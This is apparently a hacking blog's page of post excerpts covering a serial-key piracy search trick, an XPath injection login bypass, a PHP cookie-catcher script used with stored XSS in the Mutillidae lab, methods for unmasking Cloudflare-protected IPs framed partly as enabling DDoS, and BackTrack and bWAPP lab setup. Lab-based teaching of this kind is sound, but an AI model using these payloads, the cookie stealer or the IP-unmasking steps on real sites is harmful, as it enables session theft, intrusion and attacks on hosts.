HOW TO FIND SERIAL KEYS FROM GOOGLE

*** HOW TO FIND SERIAL KEYS FROM GOOGLE***
steps:-
1) go to google.com
2) write the name of the software you want key. and add 94FBR at the end

Eg :- if you want to find key of IDM then write " IDM 94FBR " (without quotes)

3) search it and you will find many sites with serial keys of that softwares

Read more ...

XPATH INJECTION TUTORIAL

XPATH INJECTION TUTORIAL

XPath is a language that has been designed and developed to operate on data that is described with XML. The XPath injection allows an attacker to inject XPath elements in a query that uses this language. Some of the possible goals are to bypass authentication or access information in an unauthorized manner.

We are gonna learn using simple example. Download code from here & put it in your local server directory.(Code is created by Amol Naik )

Sample XML Document which we gonna use:-

<Employees>
<!-- Employees Database -->
  <Employee ID="1">
    <FirstName>Johnny</FirstName>
    <LastName>Bravo</LastName>
    <UserName>jbravo</UserName>
    <Password>test123</Password>
    <Type>Admin</Type>
  </Employee>
  <Employee ID="2">
    <FirstName>Mark</FirstName>
    <LastName>Brown</LastName>
    <UserName>mbrown</UserName>
    <Password>demopass</Password>
    <Type>User</Type>
  </Employee>
  <Employee ID="3">
    <FirstName>William</FirstName>
    <LastName>Gates</LastName>
    <UserName>wgates</UserName>
    <Password>MSRocks!</Password>
    <Type>User</Type>
  </Employee>
  <Employee ID="4">
    <FirstName>Chris</FirstName>
    <LastName>Dawes</LastName>
    <UserName>cdawes</UserName>
    <Password>letmein</Password>
    <Type>User</Type>
  </Employee>
</Employees>

Bypass Authentication:-

Browse to the login.php page; here we can see simple login form.

Bypass Authentication

If the application does not properly filter such input, the tester will be able to inject XPath code and interfere with the query result. For instance, the tester could input the following values:

Username: ' or '1' = '1
Password:  ' or '1' = '1

Bypass Authentication using XPATH injection


Broken Authentication and Session Management is on number 2 in OWASP Top 10 vulnerability list 2013. In mutillidae , it contain three subsection.

Authentication Bypass
Privilege Escalation
Username Enumeration

We have already covered Username enumeration in last article & we got valid username list which exist in database. Today we are going to use authentication bypass method.

Using cookie
Using brute-force
Using SQL injection
(1)Authentication Bypass Using Cookie:-
As we know that , mutillidae is vulnerable to XSS, so we can capture cookie with help of XSS. We are going to take advantage of persistent XSS.

http://127.0.0.1/mutillidae/index.php?page=add-to-your-blog.php

Above link is vulnerable to persistent XSS attack. We can submit html to add blog section.so we are going to use cookie-catcher.

Content of cookie_catcher.php :-

<?php
header ("Location: http://192.168.56.1");
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");;
$referer=getenv ('HTTP_REFERER');
$fp = fopen('cookies.html', 'a');
fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$date. '<br> Referer: '.$referer.'<br><br><br>');
fclose($fp);
?>

Upload your cookie_catcher.php to server. For demo i used my local apache server & after execution of script it will redirect to 192.168.56.1.You can change the code according to your need. It will grab IP, cookie, Referer, time & date.

Read more ...

HOW TO FIND REAL I.P. PROTECTED BY CLOUD FLARE?

HOW TO FIND REAL I.P. PROTECTED BY CLOUD FLARE?

All these methods are based on bad admin configurations, but still are quite common

If you want to find real I.P. address of website, which is hidden by CLOUDFLARE. It has came to my attention that many booters, hosts, malicious websites, and more use CloudFlare for DDoS Protection & Anti-Abuse Report Protection. With CloudFlare protection, it is difficult to get the hosts IP; therefore, it is difficult to send an abuse report or launch a (D)DoS attack. This simple guide will help you obtain any website protected by CloudFlare's real IP, which can be used for whatever you desire!

METHOD 1:-

If you simply ping the domain , it will give i.p. which is not website`s real i.p. address. you should try following option to get real I.P. address of domain.

ping direct-connect.domain.com

             OR

ping direct.domain.com

             OR

ping ftp.domain.com

             OR

ping cpanel.domain.com

             OR

ping mail.domain.com

METHOD 2 :-

For a Long Aged Domain you can use netcraft toolbar to check real ip

For Example

Code:

http://toolbar.netcraft.com/site_report?url=DOMAIN.COM

Clearly We can see change in IP to a cloudflare one.

METHOD 3 :-

You can try bruteforcing DNS , some subdomain will have real IP of website.

For this purpose you need NMAP tools.

Open your terminal with root privellege & type following code

# nmap -sV -sS -F <target>

it will scan host & give results , it`s not give real i.p. of website.(but from this you can know weather website is protected by CLOUDFLARE or not)

Now type following code in terminal

# nmap --script dns-brute -sn <target>

it will give you real I.P. of website.


I made simple bash script which do all things for you.For more details click here.

IF all of above methods does not work ;then there is no admin misconfiguration. So you cannot find real I.P.

Read more ...

WHAT IS THE INTERNET?

WHAT IS THE INTERNET?

The internet is a network of computers which spans the entire world.

The internet is a decentralized network in other words, every computer connected to it is treated the same.

There are no special internet servers which control the whole internet, but some servers have a special role which we will discuss,have a wonderful hacking day .

Read more ...

how to install backtrack 5 in android

Install BackTrack on Android 
Mobile

What is BackTrack 5

Backtrack is a very popular linux distribution for penetration testing. It has hundreds of tools for pentesting and hacking. BackTrack provides users with easy access to a comprehensive and large collection of security-related tools ranging from port scanners to Security Audit.

BackTrack includes many well known security tools including:
- Metasploit for integration
- RFMON, injection capable wireless drivers
- Aircrack-ng
- Gerix Wifi Cracker
- Kismet
- Nmap
- Ophcrack
- Ettercap
- Wireshark (formerly known as Ethereal)
- BeEF (Browser Exploitation Framework)
- Hydra
- OWASP Mantra Security Framework, a collection of hacking tools, add-ons and scripts based on Firefox
- Cisco OCS Mass Scanner, a very reliable and fast scanner for Cisco routers with telnet and enabling of a default password.
- A large collection of exploits as well as more commonplace software such as browsers.

BackTrack arranges tools into 12 categories:
- Information gathering
- Vulnerability assessment
- Exploitation tools
- Privilege escalation
- Maintaining access
- Reverse engineering
- RFID tools
- Stress testing
- Forensics
- Reporting tools
- Services
- Miscellaneous

What you will need

- Backtrack 5 ARM
- Free space on the root of you device for backtrack 5
- A rooted device- Busybox
- SuperUser
- Terminal Emulator

- AndroidVNC
 First thing all of these are free on Google play

First you download  compressed Backtrek arm image for android Backtrack-;armv.10 Download



The Second thing is install Zararchiever for extract compressed backtrac
k image file Zararchiever Download

OK are you ready to install backtrack on android ,Now you install Busybox ,BusyBox is installer and uninstaller Android program Busybox Download

Now you install Linux Installer ,linux installer is a main application in this process Linux Installer Download
Open Linux Installer and click on Launch button,on your right side

click on Setting > Edit then change the file path there to your backtrack image, the .img file that you extracted.
Now you need a Terminal Emulator 
Terminal Emulator will open, you just have to proceed with the installation steps, ask you for a new password, and some preferences. When it's done you will get a red "root@localhost~#" like the picture bellow: 

You are now in backtrack! Now if you want backtrack in GUI , go to Google Play and install Android VNC
Open It when it finishes installing, and it will look like this
Now lets run Backtrack GUI with VNC viewer
startvnc

To connect wth VNC we must know the port where VNC listening. Run netstat -anpt and remember the port where VNC listening. In this case the port is 5901

Open AndroidVNC and fill the form like this:
Nickname : BT5
Password : toortoor
Address : 127.0.0.1
Port : 5901
Connect it and you will see Backtrack 5 interface :-)

You Download  & install more linux distribution by these same trick .
All Android  Linux Distribution Download Link 

Read more ...

Ethical Hacking Training with bWAPP Pentest lab

Ethical Hacking Training with bWAPP Pentest lab

                                 Hello buddies, after a short break m back with an interesting post on Creating Pentesting lab with bWAPP. bWAPP is one of the cutest web pentesting lab for beginners to get started and learn Web App hacking. I've wrote many Penetration testing articles, this one is also little amazing and helpful for noobs and beginners.

What is bWAPP ?

bWAPP or a buggy web application is a free and open source web application
build to allow security enthusiasts, students and developers to better secure web applications. It is for educational purposes only. bWAPP contain all types of OWASP Top 10 (2013) Vulnerabilities.

bWAPP have many types of Vulnerabilities like :

·         HTML, SQL, LDAP, XML, Get, Post, Cookies, Command etc Injection

·         Stored, Reflected, DOM, Get, Post etc Cross Site Scripting (XSS)

·         Broken Auth. & Session management

·         Forgot Password, Function, Insecure transport etc

·         Password attacks, Cookie Stealing, HTTP Management etc

·         Strong Session, Logout Management etc

·         Insecure Direct Object Refernce

·         Cross Site Request Forgery (CSRF)

·         Security Misconfiguration 

·         Insecure Cryptographic Storage

·         Failure of Restrict URL Access

·         Insufficient Transport Layer Protection

·         Unvalidated Redirects and Forwads

Others Bugs :

·         Client-Side Validation (Password)

·         Directory Traversal - Files

·         HTTP Response Splitting

·         Information Disclosure - Headers

·         PHP Eval Function

·         Remote & Local File Inclusion

·         Unrestricted File Upload

How to Install bWAPP in Windows ?

It is pretty little hard but very simple, haha just Complete following requirements :

Requirements :

·         WAMP Server (30 mb Download)

·         bWAPP Source Files (Download)

·         Little Brain!

I'll not show any tutorial to install wamp server, because it's simply very easy, download and install wamp server in your system and start it.

·     

·         Start learning from first level to last it's totally free, learn some basic HTTP/ TCP and IP networking.

·         And soon m also gonna post many ethical hacking methods.

Share it and feel free to comment, dare to ask, Knowledge is free. Sharing is caring.

Read more ...